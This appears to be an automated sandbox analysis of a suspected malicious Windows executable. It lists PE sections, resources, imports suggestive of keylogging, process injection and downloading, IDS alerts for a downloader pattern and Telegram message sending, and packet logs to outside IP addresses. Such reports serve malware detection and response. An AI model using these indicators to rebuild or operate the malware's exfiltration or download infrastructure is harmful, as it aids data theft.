[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x3e8d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x113000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x3e8d4	0x3ea00	54f00ea632248e17067b0142572f9ef3	False	0.775141124001996	data	7.501821884442315	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x113000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd4458	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd4580	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd46a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd47d0	0xd228	Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/m	English	Great Britain	0.07864312267657993
RT_MENU	0xe19f8	0x50	data	English	Great Britain	0.9
RT_STRING	0xe1a48	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xe1fdc	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xe2668	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xe2af8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xe30f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xe3750	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xe3bb8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xe3d10	0x2e6a5	data			1.0003471546468754
RT_GROUP_ICON	0x1123b8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1123cc	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1123e0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1123f4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x112408	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1124e4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T18:55:18.253825+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	193.122.6.168	80	TCP
2025-01-10T18:55:20.160088+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	193.122.6.168	80	TCP
2025-01-10T18:55:20.823127+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49706	104.21.112.1	443	TCP
2025-01-10T18:55:26.941329+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49711	193.122.6.168	80	TCP
2025-01-10T18:55:27.571605+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49739	104.21.112.1	443	TCP
2025-01-10T18:55:29.044849+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49748	104.21.112.1	443	TCP
2025-01-10T18:55:33.550358+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49778	104.21.112.1	443	TCP
2025-01-10T18:55:42.311130+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	49835	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 18:55:08.665745020 CET	49704	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:08.670774937 CET	80	49704	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:08.672317982 CET	49704	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:08.672518969 CET	49704	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:08.677337885 CET	80	49704	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:17.687822104 CET	80	49704	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:17.695811033 CET	49704	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:17.701534033 CET	80	49704	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:18.210283995 CET	80	49704	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:18.253824949 CET	49704	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:18.304605007 CET	49705	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:18.304645061 CET	443	49705	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:18.304703951 CET	49705	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:18.328421116 CET	49705	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:18.328440905 CET	443	49705	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:18.990149021 CET	443	49705	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:18.990221977 CET	49705	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:19.016685963 CET	49705	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:19.016701937 CET	443	49705	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:19.017266035 CET	443	49705	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:19.066363096 CET	49705	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:19.095504045 CET	49705	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:19.139338017 CET	443	49705	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:19.402115107 CET	443	49705	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:19.402299881 CET	443	49705	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:19.402412891 CET	49705	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:19.435100079 CET	49705	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:19.444232941 CET	49704	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:19.450254917 CET	80	49704	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:20.117927074 CET	80	49704	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:20.124922037 CET	49706	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:20.124970913 CET	443	49706	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:20.125442028 CET	49706	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:20.125725031 CET	49706	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:20.125741959 CET	443	49706	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:20.160088062 CET	49704	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:20.613369942 CET	443	49706	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:20.616080999 CET	49706	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:20.616107941 CET	443	49706	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:20.823178053 CET	443	49706	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:20.823307991 CET	443	49706	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:20.823383093 CET	49706	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:20.823731899 CET	49706	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:20.831191063 CET	49704	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:20.832747936 CET	49711	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:20.838330030 CET	80	49704	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:20.839070082 CET	80	49711	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:20.839072943 CET	49704	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:20.839134932 CET	49711	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:20.839225054 CET	49711	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:20.844412088 CET	80	49711	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:22.560298920 CET	49720	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:22.566262960 CET	80	49720	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:22.567800045 CET	49720	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:22.573586941 CET	49720	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:22.578809023 CET	80	49720	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:26.891052008 CET	80	49711	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:26.897102118 CET	49739	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:26.897140026 CET	443	49739	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:26.897203922 CET	49739	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:26.897500038 CET	49739	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:26.897514105 CET	443	49739	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:26.941329002 CET	49711	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:27.359663010 CET	80	49720	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:27.359690905 CET	443	49739	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:27.382170916 CET	49739	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:27.382205009 CET	443	49739	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:27.410078049 CET	49720	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:27.571629047 CET	443	49739	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:27.571677923 CET	443	49739	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:27.571774006 CET	49739	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:27.572297096 CET	49739	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:27.577589035 CET	49743	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:27.582400084 CET	80	49743	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:27.582479000 CET	49743	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:27.582850933 CET	49743	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:27.587605953 CET	80	49743	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:28.286345005 CET	80	49743	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:28.287904978 CET	49748	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:28.287946939 CET	443	49748	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:28.288053036 CET	49748	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:28.288331985 CET	49748	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:28.288347006 CET	443	49748	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:28.331945896 CET	49743	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:28.766916037 CET	443	49748	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:28.769256115 CET	49748	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:28.769289017 CET	443	49748	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:29.044867992 CET	443	49748	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:29.049238920 CET	443	49748	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:29.049364090 CET	49748	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:29.049812078 CET	49748	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:29.053683043 CET	49743	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:29.054781914 CET	49753	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:29.058690071 CET	80	49743	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:29.059127092 CET	49743	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:29.059565067 CET	80	49753	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:29.059907913 CET	49753	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:29.059907913 CET	49753	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:29.064735889 CET	80	49753	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:30.724973917 CET	80	49753	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:30.726254940 CET	49767	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:30.726283073 CET	443	49767	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:30.726360083 CET	49767	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:30.726614952 CET	49767	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:30.726624012 CET	443	49767	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:30.769479036 CET	49753	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:31.368890047 CET	443	49767	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:31.370841026 CET	49767	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:31.370850086 CET	443	49767	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:31.534965038 CET	443	49767	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:31.535024881 CET	443	49767	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:31.535129070 CET	49767	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:31.535794973 CET	49767	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:31.540263891 CET	49772	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:31.540297985 CET	49753	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:31.545300961 CET	80	49772	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:31.545392990 CET	49772	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:31.545423985 CET	80	49753	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:31.545496941 CET	49753	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:31.545586109 CET	49772	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:31.550390005 CET	80	49772	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:32.842113018 CET	80	49772	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:32.843466997 CET	49778	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:32.843518972 CET	443	49778	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:32.843595982 CET	49778	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:32.843883038 CET	49778	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:32.843897104 CET	443	49778	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:32.894474030 CET	49772	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:33.397209883 CET	443	49778	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:33.398950100 CET	49778	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:33.398993969 CET	443	49778	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:33.550367117 CET	443	49778	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:33.550451040 CET	443	49778	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:33.550534010 CET	49778	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:33.551114082 CET	49778	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:33.554465055 CET	49772	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:33.555607080 CET	49784	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:33.559464931 CET	80	49772	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:33.559556007 CET	49772	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:33.560401917 CET	80	49784	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:33.560673952 CET	49784	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:33.560673952 CET	49784	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:33.565553904 CET	80	49784	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:35.268125057 CET	80	49784	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:35.269463062 CET	49795	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:35.269514084 CET	443	49795	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:35.269598961 CET	49795	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:35.270056963 CET	49795	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:35.270073891 CET	443	49795	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:35.316322088 CET	49784	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:35.749944925 CET	443	49795	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:35.751529932 CET	49795	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:35.751569986 CET	443	49795	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:35.946712017 CET	443	49795	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:35.946840048 CET	443	49795	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:35.946938038 CET	49795	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:35.947415113 CET	49795	443	192.168.2.5	104.21.112.1
